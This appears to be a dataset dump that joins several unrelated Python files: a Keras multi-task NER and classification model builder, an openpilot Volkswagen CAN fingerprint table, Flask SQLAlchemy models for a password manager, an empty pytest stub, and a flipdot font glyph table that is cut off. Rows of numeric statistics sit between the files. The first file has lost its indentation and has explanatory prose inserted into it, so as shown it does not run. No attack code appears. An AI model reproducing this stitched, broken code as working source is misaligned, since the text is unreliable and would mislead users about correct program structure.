from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
input_layer = Input(shape=(input_length,), dtype='int32', name='input')
# encoder
if model_choice == 'VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
embedding = embedding_layer_vocab(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
ner_feature_layer = None
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator, embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
ner_feature_layer = None
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector, cls_feature_layer = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding, outputlayer_name='cls')
ner_branch_embedding = embedding
ner_feature_layer = cls_feature_layer
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
if ner_feature_layer is None:
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
else:
biLSTM = ner_feature_layer
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[input_layer], outputs=cls_vector)
return model, semantic_vector
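In the `CLS2NER_INPUT` branch above, the classifier's predicted label is mapped into an extended vocabulary (`vocabs.extend(cls_labels)`) and merged into the NER input as virtual keyword tokens. A rough sketch of that idea with a hypothetical helper (the actual `Lambda`/`Discriminator` plumbing works on tensors and is omitted here):

```python
def prepend_cls_keyword(token_ids, cls_label_id, vocab_size, keyword_len=2):
    # The predicted class label is assigned an id past the end of the
    # original vocabulary (ids >= vocab_size) and prepended as
    # keyword_len virtual keyword tokens for the NER branch.
    virtual_id = vocab_size + cls_label_id
    return [virtual_id] * keyword_len + token_ids
```

This shows only the id arithmetic; the real model performs the merge inside the graph so the two tasks stay jointly trainable.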
def build_model_multi_input(model_choice, **hyperparams):
from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
ner_input_layer = Input(shape=(input_length,), dtype='int32', name='ner_input')
cls_input_layer = Input(shape=(input_length,), dtype='int32', name='cls_input')
# encoder
if model_choice=='VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
ner_embedding = embedding_layer_vocab(ner_input_layer)
cls_embedding = embedding_layer_vocab(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, ner_embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN), ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, ner_embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
ner_embedding = embedding_layer(ner_input_layer)
cls_embedding = embedding_layer(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, ner_embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(ner_input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, ner_input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
ner_embedding = embedding_layer(ner_input_layer)
cls_embedding = embedding_layer(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, outputlayer_name='cls')
ner_branch_embedding = ner_embedding
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[ner_input_layer, cls_input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[ner_input_layer, cls_input_layer], outputs=cls_vector)
return model, semantic_vector
def finetune_model(model_choice, model_weights_path, freeze_list, **hyperparams):
from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
input_layer = Input(shape=(input_length,), dtype='int32', name='input')
# encoder
if model_choice == 'VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
embedding = embedding_layer_vocab(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding,
outputlayer_name='cls_')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
ner_feature_layer = None
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator, embedding,
outputlayer_name='cls_')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
ner_feature_layer = None
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector, cls_feature_layer = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding, outputlayer_name='cls_')
ner_branch_embedding = embedding
ner_feature_layer = cls_feature_layer
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
if ner_feature_layer is None:
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf_", **CRF_PARAMS)(biLSTM)
else:
biLSTM = ner_feature_layer
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf_", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[input_layer], outputs=cls_vector)
freeze_layers = [layer for layer in model.layers if layer.name in freeze_list]
trainable_layers = [layer for layer in model.layers if layer.name not in freeze_list]
for layer in freeze_layers:
layer.trainable = False
for layer in trainable_layers:
layer.trainable = True
model.load_weights(model_weights_path, by_name=True)
return model, semantic_vector
def get_freeze_list_for_finetuning(model_choice):
'''Models with different structures have different layers and layer names;
use this function to get the corresponding recommended frozen list.
Layers in the frozen list are not trainable during the finetuning process.
You can modify the returned list to customize your own frozen list.
'''
if model_choice=='VIRTUAL_EMBEDDING':
return ['bidirectional', 'embedding_vocab']
elif model_choice=='CLS2NER_INPUT':
return ['bidirectional']
else:
return ['embedding', 'bidirectional']
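`finetune_model` uses the returned names to split `model.layers` into frozen and trainable groups before loading weights. A minimal, framework-free sketch of that selection step (layer names here are illustrative):

```python
def partition_layers(layer_names, freeze_list):
    # Names in freeze_list become frozen (trainable=False);
    # every other layer keeps training during finetuning.
    frozen = [name for name in layer_names if name in freeze_list]
    trainable = [name for name in layer_names if name not in freeze_list]
    return frozen, trainable
```

In the real model the same membership test is applied to `layer.name`, after which `layer.trainable` is flipped accordingly.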
def finetuning_logger(*args):
print('Fine-tuning processing: ')
for arg in args:
try:
if os.path.split(arg)[-1].startswith('weights'):
print('Load model weights from {}'.format(arg))
except TypeError:  # os.path.split() failed: arg is not a path string
if isinstance(arg, list):
print('Frozen list is [{}]'.format(', '.join(arg))) | 52.466216 | 138 | 0.592273 | 3,184 | 31,060 | 5.380653 | 0.059359 | 0.03082 | 0.029419 | 0.026267 | 0.925811 | 0.915363 | 0.908942 | 0.90223 | 0.897794 | 0.887754 | 0 | 0.005654 | 0.339472 | 31,060 | 592 | 139 | 52.466216 | 0.829401 | 0.073664 | 0 | 0.83592 | 0 | 0 | 0.0559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015521 | false | 0 | 0.04878 | 0 | 0.08204 | 0.006652 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
50871572b2f94654715ea0bd826aa4310ee272c7 | 2,357 | py | Python | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | from selfdrive.car import dbc_dict
class CAR:
  GOLF = "2018 VW Golf R"
  ATLAS = "2018 VW Atlas SEL Premium"
  OCTAVIA = "Skoda Octavia"
FINGERPRINTS = {
CAR.GOLF: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 260: 8, 262: 8, 264: 8, 278: 8, 279: 8, 283: 8, 286: 8,
288: 8, 289: 8, 290: 8, 294: 8, 299: 8, 302: 8, 346: 8, 418: 8, 427: 8, 679: 8, 681: 8, 695: 8, 779: 8, 780: 8,
783: 8, 792: 8, 795: 8, 804: 8, 806: 8, 807: 8, 808: 8, 809: 8, 870: 8, 896: 8, 897: 8, 898: 8, 901: 8, 917: 8,
919: 8, 949: 8, 958: 8, 960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1000: 8, 1019: 8, 1122: 8, 1123: 8,
1124: 8, 1153: 8, 1162: 8, 1175: 8, 1312: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8, 1515: 8, 1520: 8, 1600: 8,
1601: 8, 1603: 8, 1605: 8, 1624: 8, 1626: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8, 1716: 8,
1717: 8, 1719: 8, 1720: 8, 1721: 8, 1792: 8
},
],
CAR.ATLAS: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 260: 8, 262: 8, 278: 8, 279: 8, 283: 8, 286: 8, 288: 8,
289: 8, 290: 8, 294: 8, 299: 8, 302: 8, 346: 8, 418: 8, 427: 8, 679: 8, 681: 8, 695: 8, 779: 8, 780: 8, 783: 8,
792: 8, 804: 8, 806: 8, 807: 8, 808: 8, 809: 8, 870: 8, 896: 8, 897: 8, 898: 8, 901: 8, 917: 8, 919: 8, 927: 8,
949: 8, 958: 8, 960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1000: 8, 1019: 8, 1122: 8, 1123: 8, 1124: 8,
1153: 8, 1162: 8, 1175: 8, 1312: 8, 1351: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8, 1515: 8, 1520: 8, 1600: 8,
1601: 8, 1603: 8, 1605: 8, 1624: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8, 1716: 8, 1717: 8,
1719: 8, 1720: 8, 1721: 8, 1792: 8
},
],
CAR.OCTAVIA: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 262: 8, 278: 8, 279: 8, 285: 8, 286: 8, 288: 8, 289: 8,
290: 8, 299: 8, 302: 8, 427: 8, 779: 8, 780: 8, 804: 8, 870: 8, 901: 8, 917: 8, 929: 8, 930: 8, 949: 8, 958: 8,
960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1153: 8, 1175: 8, 1312: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8,
1515: 8, 1520: 8, 1600: 8, 1601: 8, 1603: 8, 1624: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8,
1716: 8, 1717: 8, 1719: 8, 1720: 8
},
],
}
DBC = {
CAR.GOLF: dbc_dict('vw_mqb_2010', None),
CAR.ATLAS: dbc_dict('vw_mqb_2010', None),
CAR.OCTAVIA: dbc_dict('vw_mqb_2010', None),
}
| 53.568182 | 116 | 0.515062 | 502 | 2,357 | 2.398406 | 0.2251 | 0.023256 | 0.01495 | 0.017442 | 0.841362 | 0.819767 | 0.803156 | 0.754983 | 0.754983 | 0.740864 | 0 | 0.581207 | 0.268562 | 2,357 | 43 | 117 | 54.813953 | 0.117169 | 0 | 0 | 0.075 | 0 | 0 | 0.036063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
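The `FINGERPRINTS` table above maps each car to dicts of CAN message ID -> payload length. A hedged sketch of how such a table can be matched against observed traffic (simplified relative to openpilot's actual fingerprinting logic):

```python
def candidate_cars(observed, fingerprints):
    # A car stays a candidate if every observed (msg_id, length) pair
    # appears, with the same length, in one of its fingerprint dicts.
    matches = []
    for car, prints in fingerprints.items():
        if any(all(fp.get(msg_id) == length
                   for msg_id, length in observed.items())
               for fp in prints):
            matches.append(car)
    return matches
```

As more messages are observed, the candidate set shrinks until (ideally) a single platform remains.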
509765c6f2a14fc4961f449e1509e51f4f366f33 | 669 | py | Python | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | from app import db
from flask_login import UserMixin
class User(UserMixin, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    # A unique constraint on stored passwords/salts is a latent bug:
    # two users may legitimately produce identical stored values.
    password = db.Column(db.String(500), nullable=False)
    salt = db.Column(db.String(500), nullable=False)


class Passwords(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    Account = db.Column(db.String(80), unique=True, nullable=False)
    Password = db.Column(db.String(500), nullable=False)
    IV = db.Column(db.String(500), nullable=False)
    Count = db.Column(db.Integer, nullable=True)


# design/test_design.py (py-study-design/design, MIT)
""" Test Cases for Design module
"""
import pytest
import design as d
def test_unroll():
""" Test cases for _unroll """
pass
| 12.363636 | 34 | 0.647059 | 19 | 136 | 4.526316 | 0.631579 | 0.209302 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242647 | 136 | 10 | 35 | 13.6 | 0.834951 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
0ff14c273e4870452eaf0ef9984d8f8de626ebb1 | 28,616 | py | Python | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | 3 | 2021-07-30T22:37:30.000Z | 2022-01-26T11:19:01.000Z | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | null | null | null | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | 2 | 2016-05-26T22:52:05.000Z | 2022-01-09T12:34:36.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
five = {}
five[' '] = [[0],
[0],
[0],
[0],
[0]]
five['A'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['B'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['C'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['D'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['E'] = [[1, 1, 1, 1],
[1, 0, 0, 0],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['F'] = [[1, 1, 1, 1],
[1, 0, 0, 0],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 0, 0, 0]]
five['G'] = [[0, 1, 1, 1],
[1, 0, 0, 0],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['H'] = [[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['I'] = [[1, 1, 1],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[1, 1, 1]]
five['J'] = [[1, 1, 1],
[0, 0, 1],
[0, 0, 1],
